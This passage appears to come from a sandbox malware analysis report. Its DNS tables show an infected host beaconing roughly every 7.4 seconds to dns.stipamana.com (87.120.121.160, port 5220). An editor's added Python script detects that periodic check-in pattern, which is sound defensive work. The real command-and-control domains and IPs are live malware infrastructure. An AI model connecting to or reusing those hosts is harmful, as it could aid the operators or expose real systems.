Dec 12, 2024 21:53:39.215998888 CET | 53 | 54695 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:46.536843061 CET | 61601 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:46.659801006 CET | 53 | 61601 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:53:53.914627075 CET | 54615 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:53:54.049069881 CET | 53 | 54615 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:01.342457056 CET | 54950 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:01.466228962 CET | 53 | 54950 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:08.750524998 CET | 64215 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:08.888257027 CET | 53 | 64215 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:24.589775085 CET | 59604 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:24.724996090 CET | 53 | 59604 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:32.008743048 CET | 49520 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:32.145724058 CET | 53 | 49520 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:39.421634912 CET | 53031 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:39.544877052 CET | 53 | 53031 | 8.8.8.8 | 192.168.2.22
Dec 12, 2024 21:54:46.816812038 CET | 53112 | 53 | 192.168.2.22 | 8.8.8.8
Dec 12, 2024 21:54:46.940597057 CET | 53 | 53112 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 21:45:41.232595921 CET | 192.168.2.22 | 8.8.8.8 | 0x49d6 | Standard query (0) | www.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:45:50.418020964 CET | 192.168.2.22 | 8.8.8.8 | 0x566 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:45:58.064232111 CET | 192.168.2.22 | 8.8.8.8 | 0xf998 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:05.465405941 CET | 192.168.2.22 | 8.8.8.8 | 0xbf7f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:13.118576050 CET | 192.168.2.22 | 8.8.8.8 | 0x2a6a | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:20.784152985 CET | 192.168.2.22 | 8.8.8.8 | 0x736d | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:28.411036015 CET | 192.168.2.22 | 8.8.8.8 | 0x3d2d | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:35.823601007 CET | 192.168.2.22 | 8.8.8.8 | 0x30d0 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:43.226644993 CET | 192.168.2.22 | 8.8.8.8 | 0xa0fe | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:50.611470938 CET | 192.168.2.22 | 8.8.8.8 | 0x4dfa | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:58.002760887 CET | 192.168.2.22 | 8.8.8.8 | 0x384e | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:05.396903992 CET | 192.168.2.22 | 8.8.8.8 | 0xff0f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:12.804578066 CET | 192.168.2.22 | 8.8.8.8 | 0xc30 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:20.183312893 CET | 192.168.2.22 | 8.8.8.8 | 0x95f3 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:27.599539995 CET | 192.168.2.22 | 8.8.8.8 | 0x60f6 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:35.252535105 CET | 192.168.2.22 | 8.8.8.8 | 0x47c2 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:42.884737015 CET | 192.168.2.22 | 8.8.8.8 | 0xa868 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:50.369386911 CET | 192.168.2.22 | 8.8.8.8 | 0xe9e1 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:57.783576012 CET | 192.168.2.22 | 8.8.8.8 | 0xa3f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:05.222099066 CET | 192.168.2.22 | 8.8.8.8 | 0x72c6 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:12.664558887 CET | 192.168.2.22 | 8.8.8.8 | 0xbbb | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:20.039948940 CET | 192.168.2.22 | 8.8.8.8 | 0x7080 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:27.484338045 CET | 192.168.2.22 | 8.8.8.8 | 0xf865 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:34.893986940 CET | 192.168.2.22 | 8.8.8.8 | 0x4bae | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:42.307828903 CET | 192.168.2.22 | 8.8.8.8 | 0x8693 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:49.730556965 CET | 192.168.2.22 | 8.8.8.8 | 0xd45c | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:57.122718096 CET | 192.168.2.22 | 8.8.8.8 | 0x60b4 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:04.530304909 CET | 192.168.2.22 | 8.8.8.8 | 0x7fa0 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:11.941971064 CET | 192.168.2.22 | 8.8.8.8 | 0xd81c | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:19.341698885 CET | 192.168.2.22 | 8.8.8.8 | 0xb47f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:26.872906923 CET | 192.168.2.22 | 8.8.8.8 | 0xd0db | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:34.505686045 CET | 192.168.2.22 | 8.8.8.8 | 0xa9b0 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:41.908653021 CET | 192.168.2.22 | 8.8.8.8 | 0xb4df | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:49.296081066 CET | 192.168.2.22 | 8.8.8.8 | 0x3705 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:56.762053967 CET | 192.168.2.22 | 8.8.8.8 | 0xc097 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:04.267986059 CET | 192.168.2.22 | 8.8.8.8 | 0xb2f2 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:11.661416054 CET | 192.168.2.22 | 8.8.8.8 | 0xac99 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:19.052421093 CET | 192.168.2.22 | 8.8.8.8 | 0x3c62 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:26.473809004 CET | 192.168.2.22 | 8.8.8.8 | 0x92f1 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:33.892271996 CET | 192.168.2.22 | 8.8.8.8 | 0x3b4b | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:41.288825989 CET | 192.168.2.22 | 8.8.8.8 | 0xe248 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:48.709347963 CET | 192.168.2.22 | 8.8.8.8 | 0xb148 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:56.119364977 CET | 192.168.2.22 | 8.8.8.8 | 0xd65a | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:03.540868044 CET | 192.168.2.22 | 8.8.8.8 | 0xca4 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:10.926779032 CET | 192.168.2.22 | 8.8.8.8 | 0x7196 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:18.351907969 CET | 192.168.2.22 | 8.8.8.8 | 0x1b35 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:25.744587898 CET | 192.168.2.22 | 8.8.8.8 | 0x4718 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:33.171979904 CET | 192.168.2.22 | 8.8.8.8 | 0x930f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:40.557590008 CET | 192.168.2.22 | 8.8.8.8 | 0xb80f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:47.941709042 CET | 192.168.2.22 | 8.8.8.8 | 0xbe97 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:55.361670971 CET | 192.168.2.22 | 8.8.8.8 | 0x8824 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:02.781596899 CET | 192.168.2.22 | 8.8.8.8 | 0xf30a | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:10.190834999 CET | 192.168.2.22 | 8.8.8.8 | 0xc0c0 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:17.607659101 CET | 192.168.2.22 | 8.8.8.8 | 0xbd2c | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:25.024692059 CET | 192.168.2.22 | 8.8.8.8 | 0x53a8 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:32.431931019 CET | 192.168.2.22 | 8.8.8.8 | 0xc1b9 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:39.862896919 CET | 192.168.2.22 | 8.8.8.8 | 0x22d1 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:47.243031979 CET | 192.168.2.22 | 8.8.8.8 | 0x8a16 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:54.621396065 CET | 192.168.2.22 | 8.8.8.8 | 0x4a7 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:02.013331890 CET | 192.168.2.22 | 8.8.8.8 | 0x6f88 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:09.418307066 CET | 192.168.2.22 | 8.8.8.8 | 0xab6c | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:16.799825907 CET | 192.168.2.22 | 8.8.8.8 | 0xfc60 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:24.251733065 CET | 192.168.2.22 | 8.8.8.8 | 0x9b0b | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:31.666935921 CET | 192.168.2.22 | 8.8.8.8 | 0x4a3f | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:39.080763102 CET | 192.168.2.22 | 8.8.8.8 | 0x6282 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:46.536843061 CET | 192.168.2.22 | 8.8.8.8 | 0x2d | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:53:53.914627075 CET | 192.168.2.22 | 8.8.8.8 | 0xbaca | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:01.342457056 CET | 192.168.2.22 | 8.8.8.8 | 0x1eee | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:08.750524998 CET | 192.168.2.22 | 8.8.8.8 | 0x58e8 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:24.589775085 CET | 192.168.2.22 | 8.8.8.8 | 0xde9b | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:32.008743048 CET | 192.168.2.22 | 8.8.8.8 | 0xfcaa | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:39.421634912 CET | 192.168.2.22 | 8.8.8.8 | 0x846c | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:54:46.816812038 CET | 192.168.2.22 | 8.8.8.8 | 0xcd61 | Standard query (0) | dns.stipamana.com | A (IP address) | IN (0x0001) | false
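The DNS query table above shows a fresh A lookup for dns.stipamana.com roughly every 7.4 seconds, and the TCP table shows a new session to 87.120.121.160:5220 on the same cadence, with one check-in missing between 21:54:08 and 21:54:24. That is the classic beaconing shape a hunt query should pick up. The following is an added example by the editor, not part of the Joe Sandbox report and not code from the analysed sample: it runs a beacon-interval check over timestamps copied from the two tables above. The "browsing" series to 203.0.113.10 is constructed, the `dns:`/`tcp:` label format is the editor's own, and the thresholds (`tolerance`, `max_missed`, `min_events`, `min_fraction`) are assumptions rather than Joe Sandbox settings.

```python
"""Beacon-interval check over timestamps taken from this report's tables.

Added example by the editor; not part of the Joe Sandbox report and not code
from the analysed sample. REPORT_EVENTS are copied from the report's DNS query
and TCP packet tables. CONSTRUCTED_EVENTS, the destination label format and
the thresholds (tolerance, max_missed, min_events, min_fraction) are the
editor's assumptions, not Joe Sandbox settings.
"""
from collections import defaultdict
from datetime import datetime
from statistics import median

TS_FORMAT = "%b %d, %Y %H:%M:%S.%f"

# (timestamp as printed in the report, destination label)
REPORT_EVENTS = [
    # One A query for dns.stipamana.com per C2 check-in (report DNS query table).
    ("Dec 12, 2024 21:45:50.418020964 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:45:58.064232111 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:05.465405941 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:13.118576050 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:20.784152985 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:28.411036015 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:35.823601007 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:43.226644993 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:50.611470938 CET", "dns:dns.stipamana.com"),
    ("Dec 12, 2024 21:46:58.002760887 CET", "dns:dns.stipamana.com"),
    # First packet of each TCP session to 87.120.121.160:5220 (report TCP
    # table). One check-in is missing between 21:54:08 and 21:54:24.
    ("Dec 12, 2024 21:53:54.173089027 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:01.467451096 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:08.889147997 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:24.726164103 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:32.146852970 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:39.546040058 CET", "tcp:87.120.121.160:5220"),
    ("Dec 12, 2024 21:54:46.941155910 CET", "tcp:87.120.121.160:5220"),
    # Single lookup of the payload host: too few events to judge.
    ("Dec 12, 2024 21:45:41.232595921 CET", "dns:www.stipamana.com"),
]

# Constructed, not from the report: irregular traffic to a TEST-NET address,
# standing in for ordinary user browsing that must not be flagged.
CONSTRUCTED_EVENTS = [
    ("Dec 12, 2024 21:45:00.000000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:03.100000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:04.000000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:19.700000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:21.200000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:48.900000000 CET", "tcp:203.0.113.10:443"),
    ("Dec 12, 2024 21:45:50.000000000 CET", "tcp:203.0.113.10:443"),
]

ALL_EVENTS = REPORT_EVENTS + CONSTRUCTED_EVENTS


def parse_ts(text):
    """Parse a report timestamp such as 'Dec 12, 2024 21:45:50.418020964 CET'.
    datetime carries microseconds only, so the nanosecond field is truncated."""
    body = text.rsplit(" ", 1)[0]          # drop the trailing timezone label
    head, frac = body.split(".")
    return datetime.strptime(f"{head}.{frac[:6]}", TS_FORMAT)


def beacon_score(times, tolerance=0.2, max_missed=2):
    """Return (period_seconds, on_period_fraction) for sorted datetimes.

    The period is the median inter-arrival time, which is unaffected by a few
    missed check-ins. A gap is on-period when it lies within tolerance*period
    of k*period for k in 1..max_missed+1, so the ~15.8 s gap in the TCP series
    (one missed beacon) still counts as fitting the ~7.4 s cadence."""
    if len(times) < 2:
        return None, 0.0
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    period = median(gaps)
    if period <= 0:
        return period, 0.0
    hits = 0
    for gap in gaps:
        k = round(gap / period)
        if 1 <= k <= max_missed + 1 and abs(gap - k * period) <= tolerance * period:
            hits += 1
    return period, hits / len(gaps)


def find_beacons(events, min_events=5, min_fraction=0.8):
    """Group events by destination label and return the periodic ones as
    {label: (period_seconds, on_period_fraction)}."""
    by_dst = defaultdict(list)
    for ts, label in events:
        by_dst[label].append(parse_ts(ts))
    flagged = {}
    for label, times in by_dst.items():
        if len(times) < min_events:
            continue
        period, fraction = beacon_score(sorted(times))
        if fraction >= min_fraction:
            flagged[label] = (round(period, 3), round(fraction, 2))
    return flagged


if __name__ == "__main__":
    for label, (period, fraction) in find_beacons(ALL_EVENTS).items():
        print(f"{label}: period {period} s, {fraction:.0%} of gaps on-period")
```

Both report series come out with a period of about 7.4 s and every gap on-period, the single www.stipamana.com lookup is skipped for lack of events, and the constructed irregular series scores zero. Using the median rather than the mean as the period estimate is what keeps the 15.8 s gap from skewing the result; a mean-and-standard-deviation test on the same TCP series would give a coefficient of variation above 0.4 and miss it.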
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 21:45:41.603100061 CET | 8.8.8.8 | 192.168.2.22 | 0x49d6 | No error (0) | www.stipamana.com | | 94.156.167.55 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:45:50.788270950 CET | 8.8.8.8 | 192.168.2.22 | 0x566 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:45:58.198769093 CET | 8.8.8.8 | 192.168.2.22 | 0xf998 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:05.837680101 CET | 8.8.8.8 | 192.168.2.22 | 0xbf7f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:13.491419077 CET | 8.8.8.8 | 192.168.2.22 | 0x2a6a | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:21.156843901 CET | 8.8.8.8 | 192.168.2.22 | 0x736d | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:28.545562983 CET | 8.8.8.8 | 192.168.2.22 | 0x3d2d | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:35.946887970 CET | 8.8.8.8 | 192.168.2.22 | 0x30d0 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:43.361864090 CET | 8.8.8.8 | 192.168.2.22 | 0xa0fe | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:50.745820045 CET | 8.8.8.8 | 192.168.2.22 | 0x4dfa | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:46:58.137223005 CET | 8.8.8.8 | 192.168.2.22 | 0x384e | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:05.531486988 CET | 8.8.8.8 | 192.168.2.22 | 0xff0f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:12.938827038 CET | 8.8.8.8 | 192.168.2.22 | 0xc30 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:20.306443930 CET | 8.8.8.8 | 192.168.2.22 | 0x95f3 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:27.974983931 CET | 8.8.8.8 | 192.168.2.22 | 0x60f6 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:35.624083042 CET | 8.8.8.8 | 192.168.2.22 | 0x47c2 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:43.018866062 CET | 8.8.8.8 | 192.168.2.22 | 0xa868 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:50.505089998 CET | 8.8.8.8 | 192.168.2.22 | 0xe9e1 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:47:57.922924042 CET | 8.8.8.8 | 192.168.2.22 | 0xa3f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:05.356887102 CET | 8.8.8.8 | 192.168.2.22 | 0x72c6 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:12.789191008 CET | 8.8.8.8 | 192.168.2.22 | 0xbbb | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:20.175071955 CET | 8.8.8.8 | 192.168.2.22 | 0x7080 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:27.608385086 CET | 8.8.8.8 | 192.168.2.22 | 0xf865 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:35.028428078 CET | 8.8.8.8 | 192.168.2.22 | 0x4bae | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:42.443259001 CET | 8.8.8.8 | 192.168.2.22 | 0x8693 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:49.865164042 CET | 8.8.8.8 | 192.168.2.22 | 0xd45c | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:48:57.256814957 CET | 8.8.8.8 | 192.168.2.22 | 0x60b4 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:04.665467024 CET | 8.8.8.8 | 192.168.2.22 | 0x7fa0 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:12.076205969 CET | 8.8.8.8 | 192.168.2.22 | 0xd81c | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:19.476135969 CET | 8.8.8.8 | 192.168.2.22 | 0xb47f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:27.244282007 CET | 8.8.8.8 | 192.168.2.22 | 0xd0db | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:34.640294075 CET | 8.8.8.8 | 192.168.2.22 | 0xa9b0 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:42.042783976 CET | 8.8.8.8 | 192.168.2.22 | 0xb4df | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:49.430185080 CET | 8.8.8.8 | 192.168.2.22 | 0x3705 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:49:56.896336079 CET | 8.8.8.8 | 192.168.2.22 | 0xc097 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:04.402148962 CET | 8.8.8.8 | 192.168.2.22 | 0xb2f2 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:11.784126997 CET | 8.8.8.8 | 192.168.2.22 | 0xac99 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:19.187814951 CET | 8.8.8.8 | 192.168.2.22 | 0x3c62 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:26.607886076 CET | 8.8.8.8 | 192.168.2.22 | 0x92f1 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:34.026778936 CET | 8.8.8.8 | 192.168.2.22 | 0x3b4b | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:41.424036026 CET | 8.8.8.8 | 192.168.2.22 | 0xe248 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:48.844182968 CET | 8.8.8.8 | 192.168.2.22 | 0xb148 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:50:56.242716074 CET | 8.8.8.8 | 192.168.2.22 | 0xd65a | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:03.665529966 CET | 8.8.8.8 | 192.168.2.22 | 0xca4 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:11.061579943 CET | 8.8.8.8 | 192.168.2.22 | 0x7196 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:18.486056089 CET | 8.8.8.8 | 192.168.2.22 | 0x1b35 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:25.878966093 CET | 8.8.8.8 | 192.168.2.22 | 0x4718 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:33.306296110 CET | 8.8.8.8 | 192.168.2.22 | 0x930f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:40.693830967 CET | 8.8.8.8 | 192.168.2.22 | 0xb80f | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:48.075679064 CET | 8.8.8.8 | 192.168.2.22 | 0xbe97 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:51:55.496759892 CET | 8.8.8.8 | 192.168.2.22 | 0x8824 | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 21:52:02.904727936 CET | 8.8.8.8 | 192.168.2.22 | 0xf30a | No error (0) | dns.stipamana.com | | 87.120.121.160 | A (IP address) | IN (0x0001) | false
